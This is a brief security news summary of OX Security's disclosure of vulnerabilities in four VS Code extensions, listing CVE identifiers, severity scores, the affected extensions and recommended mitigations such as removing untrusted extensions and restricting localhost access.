Researchers disclosed multiple security vulnerabilities in four popular Microsoft Visual Studio Code extensions—Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview—that can allow attackers to exfiltrate local files and execute code remotely. With more than 125 million combined installs, OX Security warns that a single malicious extension or vulnerability can enable lateral movement and full organizational compromise, so developers should remove untrusted extensions, avoid applying untrusted configurations, keep extensions updated, and harden localhost/network settings. #LiveServer #MarkdownPreviewEnhanced
Keypoints
- Multiple flaws were found in Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview.
- The extensions have been installed over 125 million times, amplifying the potential impact.
- CVE-2025-65717 in Live Server (CVSS 9.1) can exfiltrate local files via localhost:5500.
- CVE-2025-65716 in Markdown Preview Enhanced (CVSS 8.8) allows arbitrary JavaScript execution via crafted .md files, and CVE-2025-65715 in Code Runner enables code execution through manipulated settings.json.
- Mitigations include uninstalling or disabling untrusted extensions, avoiding untrusted configurations, updating extensions, restricting localhost and network access, and turning off localhost services when not in use.
Read More: https://thehackernews.com/2026/02/critical-flaws-found-in-four-vs-code.html